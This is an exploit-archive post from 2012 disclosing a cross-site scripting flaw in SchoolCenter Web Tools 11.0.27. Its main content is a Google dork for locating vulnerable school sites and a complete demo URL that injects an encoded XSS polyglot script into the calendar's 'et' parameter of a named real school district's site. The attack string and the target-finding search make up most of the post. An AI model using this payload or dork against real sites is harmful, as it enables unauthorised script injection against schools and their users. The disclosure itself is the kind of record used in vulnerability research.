Home / exploits SchoolCenter Web Tools 11.0.27 Cross Site Scripting
Posted on 12 April 2012
# Exploit Title: SchoolCenter Web Tools Version 11.0.27 Cross Site Scripting # Date: 11.04.2012 # Author: Sony and Flexxpoint # Software Link: www.thinqed.com # Google Dorks: inurl:/education/components/calendar/ site:edu # Web Browser : Mozilla Firefox # Site : http://insecurity.ro # PoC: http://st2tea.blogspot.com/2012/04/schoolcenter-web-tools-version-11027.html .................................................................. Well, we have xss in calendar. Demo: http://schoolctr.hebisd.edu/education/components/calendar/default.php?sectiondetailid=74&my_family=&d=4&m=4&y=2012&et=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3Eday http://4.bp.blogspot.com/-iUHFDKmBpO8/T4W34sQCX4I/AAAAAAAAA8g/uKfMF4sIUrQ/s1600/xss.JPG etc..
